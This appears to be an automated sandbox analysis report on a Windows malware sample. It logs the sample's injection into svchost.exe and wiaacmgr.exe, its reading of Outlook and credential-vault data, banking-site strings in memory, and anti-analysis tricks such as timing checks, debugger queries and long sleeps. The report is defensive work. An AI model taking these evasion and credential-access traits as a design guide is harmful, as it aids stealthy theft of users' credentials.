Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wiaacmgr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\wiaacmgr.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: AuKUol8SPU.exe

Static file information: File size 1182208 > 1048576

Source: AuKUol8SPU.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: AuKUol8SPU.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: AuKUol8SPU.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: AuKUol8SPU.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: AuKUol8SPU.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: AuKUol8SPU.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: AuKUol8SPU.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kObgmFzfBE.exe, 00000003.00000000.1512442762.00000000009AE000.00000002.00000001.01000000.00000004.sdmp, kObgmFzfBE.exe, 00000008.00000000.1657959129.00000000009AE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: AuKUol8SPU.exe, 00000000.00000003.1366370637.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1366079115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1493313421.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491765318.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597192227.0000000005300000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1591272724.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597192227.000000000549E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1594031438.0000000005155000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AuKUol8SPU.exe, 00000000.00000003.1366370637.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1366079115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1493313421.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491765318.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000005.00000002.2597192227.0000000005300000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1591272724.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597192227.000000000549E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1594031438.0000000005155000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000002.00000003.1558518165.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558656536.000000000362E000.00000004.00000020.00020000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000002.2595623283.0000000001338000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wiaacmgr.pdb source: svchost.exe, 00000002.00000003.1558518165.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558656536.000000000362E000.00000004.00000020.00020000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000002.2595623283.0000000001338000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597992420.000000000592C000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658574573.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1876564495.00000000141DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597992420.000000000592C000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658574573.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1876564495.00000000141DC000.00000004.80000000.00040000.00000000.sdmp

Source: AuKUol8SPU.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: AuKUol8SPU.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: AuKUol8SPU.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: AuKUol8SPU.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: AuKUol8SPU.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B14B37 LoadLibraryA,GetProcAddress,

0_2_00B14B37

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B38945 push ecx; ret	0_2_00B38958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A07C push ecx; iretd	2_2_0041A07D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407174 push ss; ret	2_2_00407192
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00405133 pushfd ; retf	2_2_00405135
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A9EE push edi; retf	2_2_0041A9FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A9F3 push edi; retf	2_2_0041A9FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AAE5 push es; ret	2_2_0040AAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403290 push eax; ret	2_2_00403292
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D3B2 pushad ; retf	2_2_0040D3B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417609 push eax; retf	2_2_0041760A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004127CA push ebx; iretd	2_2_004127CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0225F pushad ; ret	2_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C027FA pushad ; ret	2_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx	2_2_03C309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0283D push eax; iretd	2_2_03C02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C01368 push eax; iretd	2_2_03C01369
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C01065 push edi; ret	2_2_03C0108A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C018F3 push edx; iretd	2_2_03C01906
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05923D9B push es; ret	3_2_05923D9E
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0592EDD5 push ebx; ret	3_2_0592EDD6
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05933CA4 push edi; retf	3_2_05933CB4
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05933CA9 push edi; retf	3_2_05933CB4
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0592042A push ss; ret	3_2_05920448
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05926668 pushad ; retf	3_2_0592666C
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_059308BF push eax; retf	3_2_059308C0
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0591E3E9 pushfd ; retf	3_2_0591E3EB
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_05933332 push ecx; iretd	3_2_05933333
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe	Code function: 3_2_0592BA80 push ebx; iretd	3_2_0592BA81
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053309AD push ecx; mov dword ptr [esp], ecx	5_2_053309B6
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0530135D push eax; iretd	5_2_05301369
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_03274376 push eax; retf	5_2_03274377

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00B148D7
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00B95376

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00B33187

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	API/Special instruction interceptor: Address: 4103294
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FF90818DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03C7096E rdtsc

2_2_03C7096E

Source: C:\Windows\SysWOW64\wiaacmgr.exe	Window / User API: threadDelayed 1433			Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Window / User API: threadDelayed 8539			Jump to behavior

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105955

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	API coverage: 5.1 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 1820	Thread sleep count: 1433 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 1820	Thread sleep time: -2866000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 1820	Thread sleep count: 8539 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 1820	Thread sleep time: -17078000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe TID: 3632	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\wiaacmgr.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B7445A
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7C6D1 FindFirstFileW,FindClose,	0_2_00B7C6D1
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B7C75C
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7EF95
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7F0F2
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7F3F3
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B737EF
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B73B12
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7BCBC
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0327C9D0 FindFirstFileW,FindNextFileW,FindClose,	5_2_0327C9D0

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B149A0

Source: o3Z6161.5.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: o3Z6161.5.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: o3Z6161.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: o3Z6161.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: wiaacmgr.exe, 00000005.00000002.2599761175.000000000842E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,1169649
Source: o3Z6161.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: o3Z6161.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: o3Z6161.5.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: o3Z6161.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: o3Z6161.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: firefox.exe, 00000009.00000002.1878049490.0000026A540ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
Source: o3Z6161.5.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: o3Z6161.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: o3Z6161.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: o3Z6161.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: o3Z6161.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: o3Z6161.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: o3Z6161.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: o3Z6161.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: o3Z6161.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: kObgmFzfBE.exe, 00000008.00000002.2595973888.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: o3Z6161.5.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: wiaacmgr.exe, 00000005.00000002.2599761175.000000000842E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,
Source: o3Z6161.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: o3Z6161.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: o3Z6161.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: o3Z6161.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: o3Z6161.5.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: o3Z6161.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: o3Z6161.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: o3Z6161.5.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: o3Z6161.5.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: wiaacmgr.exe, 00000005.00000002.2599761175.000000000842E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: COM.HKVMware20,?B
Source: o3Z6161.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: o3Z6161.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: o3Z6161.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

API call chain: ExitProcess graph end node

graph_0-104730

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03C7096E rdtsc

2_2_03C7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417BA3 LdrLoadDll,

2_2_00417BA3

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B83F09 BlockInput,

0_2_00B83F09

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B13B3A

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00B45A7C

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B14B37 LoadLibraryA,GetProcAddress,

0_2_00B14B37

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_04103500 mov eax, dword ptr fs:[00000030h]	0_2_04103500
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_04103560 mov eax, dword ptr fs:[00000030h]	0_2_04103560
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_04101E70 mov eax, dword ptr fs:[00000030h]	0_2_04101E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03CEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03CB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]	2_2_03CDE3DB
